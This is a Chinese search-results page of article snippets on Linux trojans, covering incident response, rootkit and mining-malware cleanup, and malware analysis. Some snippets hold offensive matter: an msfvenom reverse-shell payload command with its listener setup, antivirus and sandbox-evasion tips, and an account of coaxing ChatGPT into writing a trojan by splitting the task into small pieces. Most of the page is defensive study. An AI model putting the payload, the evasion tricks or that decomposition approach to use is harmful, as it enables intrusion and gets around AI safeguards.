首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux应急响应(四):盖茨木马

0x00 前言 Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马,主要恶意特点是具备了后门程序,DDoS攻击的能力,并且会替换常用的系统文件进行伪装。...从以上种种行为发现该病毒与“盖茨木马”有点类似,具体技术分析细节详见: Linux平台“盖茨木马”分析 http://www.freebuf.com/articles/system/117823.html...悬镜服务器卫士丨Linux平台“盖茨木马”分析 http://www.sohu.com/a/117926079_515168 手动清除木马过程: 1、简单判断有无木马 #有无下列文件 cat /etc...查看大小是否正常 ls -lh /bin/netstat ls -lh /bin/ps ls -lh /usr/sbin/lsof ls -lh /usr/sbin/ss 2、上传如下命令到/root.../bin/ls 提取rpm包中ls命令到当前目录的/bin/ls cp /root/bin/ls /bin/ 把ls命令复制到/bin/目录 修复文件丢失 挂载命令rpm包: mkdir /mnt

1.9K41
您找到你想要的搜索结果了吗?
是的
没有找到

linux服务器木马后门检测

在服务器木马后门检测中rookit也是根据特征的,他们检查的都是某一些rk的看这个root或者一些其他的通用型root的,但我现在所使用的项目,它这个UK的可能比较小众,所以没有被检测出来。...也就是说他做了一些这个隐藏,加入到内核里之后,看这都是挖点,说明已经被更改了,那这个时候就要去排查了,他是不是真的被更改了,或者说看一是不是真的被替换了,那就需要去排查一了。...那第二种方法就是说这种就比较顽强的了,你要把Linux挂载到其他的Linux系统上,去找到它,这样的话把它删除掉就可以了。...其中rookit demo就是我现在用的rookit,大家可以自己编译尝试一,那我用到的版本是乌班图20.04,在这里严重声明一,文中所用的技术只能用于安全研究,不能用于任何非法用途。...那请勿在生产环境测试的因为rookit并不是一个稳定的内核,一旦插入的内核有可能导致整个Linux崩溃,如果遇到一些被替换了系统命令文件的木马后门无法查找的话可以向服务器安全服务商SINE安全寻求技术支持进行详细的木马后门排查

1.1K70

linux服务器被入侵查询木马

记录一次查询清除木马过程  木马名称: Linux.BackDoor.Gates.5 链接:https://forum.antichat.ru/threads/413337/ 前两天服务器被扫描后...进程杀了又起来,文件删了又自动生成,无奈之下只好想了一个怪招,把/bin/bash重命名一  再查询基础命令是否被掉包: ? 对比下其他在正常服务器的显示如下: ? 怒了有没有!...分析了一,这些木马程序名字变着花样来,但万变不离其宗,名字都写  在/etc/rc.d/init.d/DbSecuritySpt和/etc/rc.d/init.d/selinux里面,而且名字和正常的服务很像...FOUND为病毒 grep FOUND /root/usrclamav.log /usr/bin/.sshd: Linux.Trojan.Agent FOUND /usr/sbin/ss: Linux.Trojan.Agent...下面的内容设置可以实现在Linux所有用户,不管是远程还是本地登陆,在本机的所有操作都会记录下来,并生成包含“用户/IP/时间”的文件存放在指定位置。

5.5K41

安全视角木马免杀技术讨论

而钓鱼成功与否一方面和钓鱼文案的诱人程度以及木马的免杀是否到位有着密切的关系。下面介绍常见的一些免杀技巧。...其实我觉得,最起码要识别出在一片连续的区域内存在着一种特殊的情况,那就是一个字节和另一个字节之间相隔了多个相同的字节,这种情况就很可能就是被垃圾数据填充的 shellcode 。...所以,如果我们的木马没有做好反调试,很容易就被沙箱检测出来。 我这个马目前只有9k大小,完全有可能被上传到云端的沙箱里检测。所以,我们还需要做一些反调试的操作,阻碍云沙箱的行为检测。...最后秀一在virustotal上检测的成绩: ?...0x5 后记 当然,随着病毒检测技术的不断改进,现在的病毒检测技术已经引入了一些机器学习的技术了,比如使用二类支持向量机对正常软件和恶意软件进行分类,以及使用多类支持向量机对蠕虫,病毒,木马和正常软件进行分类等等

1.2K10

记一次Linux木马清除过程

前段时间公司发生了一起服务器入侵事件,在此分享给大家也顺便理顺linux入侵应急响应思路。 一、事件描述 某天监控同事反馈有台机器cpu飙高到2000%,可能机器已经被黑。...至此,算是暂时消停一,简单总结一此病毒特征,其一方面释放挖矿病毒进行挖矿,同时又对公网ssh服务进行爆破以扩大感染面。在这里同时给了我一个提醒,或许这台服务器就是通过ssh爆破被入侵的。...2.2 查找入侵痕迹 一般情况,入侵可能有以下几种方式: a.各种弱口令爆破 b.系统漏洞的利用 c.应用漏洞的利用 上面说了,可能是通过ssh爆破被入侵的,我们先来验证一。...三、总结 首先啰嗦一,关于linux主机,高危端口真得万万不能全网开放。看了日志后,发现黑客真是时时刻刻在爆破啊。...关于linux入侵的排查思路,总结如下: 1.查看异常进程活动-查找是否有异常进程和端口占用 1.1查找占用cpu最多的进程,相关命令:运行top命令后,键入大写字母P按cpu排序; 1.2查找占用内存最多的进程

2.8K21

分析过程:服务器被黑安装Linux RootKit木马

前言 疫情还没有结束,放假只能猫家里继续分析和研究最新的攻击技术和样本了,正好前段时间群里有人说服务器被黑,然后扔了个样本在群里,今天咱就拿这个样本开刀,给大家研究一这个样本究竟是个啥,顺便也给大家分享一些关于...& f0rb1dd3分享的Linux RootKit高级技术,加载执行Linux Rootkit木马,如下所示: 2.解密Linux RootKit木马数据过程,如下所示: 3.Linux RootKit...木马数据,如下所示: 4.笔者自己编写了一个简单的解密程序,用于解密上面的Linux RootKit木马数据,如下所示: 5.解密Linux RootKit木马数据之后,如下所示: 6.通过逆向分析解密出来的...Linux RootKit木马,发现是Reptile木马源代码修改的,如下所示: 7.Reptile是一款开源的Linux RootKit木马程序,Linux RootKit木马功能非常强大,如下所示...: 可以隐藏文件、目录、自身、网络连接、反弹shell木马等,Linux RootKit木马运行之后,如下所示: 该Linux RootKit木马可以通过Volatility内存检测的方法发现木马后门模块

1.5K50

浅谈木马

它可以计算机管理员未发觉的情况执行命令、泄露用于信息、甚至可以窃取管理员用户权限。如今已成为黑客常用的工具之一。...payload),用于反弹shell lhost=       这里写的是攻击者的IP lport=       这里写的是攻击者主机上用于监听的端口(任意未被占用的端口) -f 文件类型 -o 输出的文件名 Linux...木马 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f elf -o muma.elf...meterpreter/reverse_tcp       #加载payload模块 set lhost       本机IP set lport 4444 exploit/run 开启监听后,我们在目标主机上运行一木马程序...甚至可以以感染了木马的主机为跳板,攻击该网络的其他主机等操作。 可能到了这里有人会觉得这些木马很简单,很容易就被目标发现。

23520

Linux内核级木马与病毒攻防:基础工具介绍

要想在Linux系统上开发或研究木马病毒等特殊程序,我们需要使用一系列强大的开发和调试攻击。本节先介绍几种在Linux系统上极为强大的工具。...第一个当然是gdb了,在Linux上,它是唯一能用于程序调试的利器。...我们后面开发代码或调试分析其他病毒或木马的设计模式和原理时,必须使用gdb作为手术刀,对要研究的病毒和木马进行”剖尸检验“,通过gdb调查木马或病毒的代码设计方法,同时也使用gdb加载恶意代码,研究其运转流程...第二个是objdump,它的作用是将恶意代码所编制成的可执行文件内部信息抽取出来,例如如果病毒或木马最后编译成ELF格式的可执行文件,那么我们可以使用该工具将里面的各种信息展示出来,举个例子,使用C语言写一个...; } 然后使用gcc编译成可执行文件,命令如下: gcc -Wall -g hello_world.c -o hello_world 注意到gcc也是在Linux上进行程序开发必不可少的编译器

1.4K10

Linux系统是否被植入木马的排查流程梳理

在日常繁琐的运维工作中,对linux服务器进行安全检查是一个非常重要的环节。今天,分享一如何检查linux系统是否遭受了入侵?...三、顺便说下一次Linux系统被入侵/中毒的解决过程 在工作中碰到系统经常卡,而且有时候远程连接不上,从本地以及远程检查一这个系统,发现有不明的系统进程。 初步判断就是可能中毒了!!!...意识到了这台测试机被人种了木马,于是开始了紧张的排查过程: 1)运行ps和top命令 发现了两个陌生名称的程序(比如mei34hu)占用了大部分CPU资源,显然这是别人植入的程序!...7)顾虑到系统常用命令中(如ls,ps等)可能会隐藏启动进程,这样一旦执行又会拉起木马程序。...2)将可疑文件设为不可执行,用chattr +ai将几个重要目录改为不可添加和修改,再将进程杀了,再重启 3)chkrootkit之类的工具查一 对于以上这些梳理的木马排查的思路要清楚,排查手段要熟练

7.5K100

ld-linux-x86-64挖矿木马实战记录

现将几起病毒木马的处理过程整理一跟大家分享,本系列偏向于实战。...2、查看资源占用情况 输入top命令,其中PID为145598的进程占用大量的CPU资源,而内存占用率并不是很高,非常符合挖矿木马的特征,其中ld-linux-x86-64非常可疑。 ?...3、可疑文件定位 搜索ld-linux字符串,其中/dev/shm/.x/文件夹下的两文件可能有异常。上网搜ld-linux-x86-64关键字,发现有类似的挖矿木马的报道。 ?...后续安排 为了防止同类事件再次发生,急需对已发现问题进行整改,主要有以下几点: 由于木马会自动扫描ssh端口弱口令并自动传播,建议抽查或全面排查其他linux服务器是否有中同样的挖矿木马。...用top命令查看资源占用最高的进程是否为ld-linux-x86-64,如是,说明已中木马

4.8K30

Kronos银行木马被发现,疑似新版Osiris木马

根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。...最初的样本似乎是处于测试阶段,实际活动在6月旬开始实施,当时研究人员开始检测malspam并利用套件向野外用户提供这个新版本。...Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。...最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。

1.3K50

linux安装opencv_linux安装pycharm

,进入到Linux版的RabbitMQ下载页面中 7、找到Download的 rabbitmq-server-generic-unix-3.7.16.tar.xz下载链接并点击,开始进行下载RabbitMQ...三、把下载好的RabbitMQ 和 Erlang上传到Linux服务器上 1、打开WinSCP,把我们下载好的RabbitMQ 和 Erlang安装包,上传到Linux的 /mnt/ 文件目录下...2、使用putty连接到我们的Linux服务器,进入到/mnt/ 文件目录中,并解压上传的RabbitMQ 和 Erlang安装包 [root@localhost ~]# cd /mnt/ //...PID file not written; -detached was passed. 5、在浏览器的地址栏中输入你 服务器的ip地址:15672,即可访问RabbitMQ的管理登录界面,例如我的Linux...(3)策略制定者(policymaker):可登陆管理控制台(启用management plugin的情况), 同时可以对policy进行管理。

24.7K10

挖矿木马详解

攻击者通过各种手段将挖矿程序植入受害者的计算机中,在受害者不知情的情况利用其计算机的云算力进行挖矿,从而获取利益,这类非法植入用户计算机的挖矿程序就是挖矿木马。 挖矿木马,挖的是啥?...挖矿木马自查 挖矿木马自查 发现挖矿 CPU使用率 通常对挖矿木马的感知,主要表现在主机的使用感上,在主机正常运行的情况,突然变得卡顿,并且CPU的使用率高于正常使用时的数值或达到了100%: 感知产品...是否使用了全盘查杀,很多情况安全软件的快速查杀只查杀特定目录; 2....通常情况,挖矿木马都会有系统驻留模块,会通过计划任务、服务等方式不断的拉起恶意进程,因此仅结束进程不一定能有效的清除,建议使用专业的安全软件进行处置。...Windows系统用于存放字体文件的目录,有一些病毒会将自身的程序隐藏在该目录下,例如Explorer一键挖矿,正常使用资源管理器在Fonts目录下无法查看到木马文件,需要借助PCHunter工具查看

11.7K61

在我的指导,ChatGPT写了一个木马

昨天晚上,在我的“指导”,我让这家伙帮我写了一个“木马”。 当然,之所以要打上引号,是因为这个木马功能很简单,也没做啥过杀毒软件、隐藏等工作,我们单纯来看一这家伙的编程能力。 让我们开始吧!...就我的经验来看,只要我们把复杂的编程需求一步步拆解,直到拆解成它可以理解的功能单元,交给它来实现,最后我们将这些功能单元融合在一起,加工一基本就能使用。...就拿这个简单的“木马”程序来说,我自己来写可能坑次坑次要整上一个小时,但用这个工具,可能几分钟就搞定了。 以后从面向百度编程,面向博客园和CSDN编程,迈向面向ChatGPT编程,未尝不可啊!

49910
领券